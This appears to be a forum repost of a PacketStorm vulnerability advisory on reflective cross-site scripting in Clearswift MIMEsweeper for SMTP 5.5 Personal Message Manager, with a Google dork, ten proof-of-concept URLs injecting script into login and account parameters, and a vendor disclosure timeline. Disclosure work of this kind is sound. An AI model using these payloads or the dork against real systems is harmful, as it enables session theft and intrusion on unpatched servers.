Jump to content
Praetorian503

MIMEsweeper For SMTP 5.5 Cross Site Scripting

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

MIMEsweeper for SMTP version 5.5 Personal Message Manager suffers from multiple cross site scripting vulnerabilities.

Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflective XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]

[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>

[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor for evaluation progress, v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor in regards the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave a notice for public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due to date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested to postpone the disclosure after the patch be public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested for demo license to verify fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...